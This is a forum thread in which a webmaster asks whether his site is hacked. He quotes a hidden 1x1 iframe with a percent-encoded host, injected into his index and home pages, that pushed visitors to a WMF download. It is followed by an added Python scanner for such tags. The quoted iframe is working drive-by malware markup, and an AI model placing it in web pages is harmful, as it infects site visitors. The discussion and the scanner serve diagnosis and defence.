Is my website being hacked?

jimi_81

OSNN Senior Addict
Political User
#1
OK, I went to check on a site I maintain, and the page did not display; instead I was routed to download a WMF file.

The two files that the page uses to launch, index.html and home.php, had the following lines of code at the top of each file:

Code:
<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
I didn't check the file's last-modified date... I just made the correction without thinking.

Has anyone ever heard of this happening?
What happened!
 

melon

MS-DOS 2.0
Political User
#3
I had the same thing happen to me. It's clearly a hack of some sort, since I'm on a paid host. I checked the "last modified" date and then my access logs, which revealed nothing out of the ordinary. I have a feeling that, since I'm on a shared host, someone else on the server was running vulnerable software (or maybe even the server itself) and just searched for every "public_html/index.html" (and probably other files like "home.php" there) it could find on the server.

Unfortunately, I wish I had some answers as to its origin. I haven't been able to find any information myself.

Melon
 

jimi_81

OSNN Senior Addict
Political User
#4
Some things I have been looking at in the logs...
Under browser lists, I see something called Curl. Never heard of it.

I googled Curl... What does this mean:
curl is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, TFTP, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. curl supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, kerberos...), file transfer resume, proxy tunneling and a busload of other useful tricks.
According to the stats page, only 1 user has curl, 1 hit registered. Looks odd, that's why I bring it up.

The site is hosted on ipowerweb.com... I've reported it to them.
The URL the iframe points to is a shady-looking site: trust4free.ws
 

jimi_81

OSNN Senior Addict
Political User
#6
I feel sick to my stomach.
ipowerweb seems to be the problem.

I won't be renewing with them, that's for sure.
What a piss off.

Thanks guys, reps
 

SPeedY_B

I may actually be insane.
#7
It could just be a vulnerable install of some web based software (awstats, phpBB, etc.) on the same server as your site.

Happened to me, site was blatantly defaced though, so it was spotted straight away.
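
A check for the kind of tag quoted in the first post, as an added example that is not part of the thread or any poster's code: it flags iframes that are 0 or 1 pixel in size or whose host is percent-encoded, and reports the decoded URL. The function names and the second sample line are constructed for illustration; `scan_tree` goes beyond the two files named in the thread and walks every .html, .htm and .php file under a directory.

```python
import re
from pathlib import Path
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Attribute values may be double-quoted, single-quoted or bare (as in the thread's tag).
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
PCT_RE = re.compile(r"%[0-9a-fA-F]{2}")

# First line is the tag quoted in the thread; second is a constructed benign embed.
SAMPLE = (
    '<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 '
    'frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>\n'
    '<iframe src="https://maps.example.com/embed" width="600" height="400"></iframe>\n'
)

def parse_attrs(tag):
    """Return lower-cased attribute names mapped to their values."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def tiny(value):
    """True when a width/height value is 0 or 1 (an invisible frame)."""
    return (value or "").strip() in ("0", "1")

def scan_text(text):
    """Return (line number, decoded src, reasons) for each suspicious iframe."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for tag in IFRAME_RE.findall(line):
            attrs = parse_attrs(tag)
            src = attrs.get("src", "")
            # Host is whatever sits between the scheme and the first /, ? or #.
            host = re.split(r"[/?#]", src.split("://", 1)[-1], maxsplit=1)[0]
            reasons = []
            if tiny(attrs.get("width")) and tiny(attrs.get("height")):
                reasons.append("invisible frame")
            if PCT_RE.search(host):
                reasons.append("percent-encoded host")
            if reasons:
                findings.append((lineno, unquote(src), reasons))
    return findings

def scan_tree(root, suffixes=(".html", ".htm", ".php")):
    """Scan every page under root; return {path: findings} for flagged files."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            if found := scan_text(path.read_text(errors="replace")):
                hits[str(path)] = found
    return hits
```

Running `scan_tree` against a copy of the web root, and comparing the flagged files' modification times with the FTP and access logs, narrows down when the tag was written.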
 
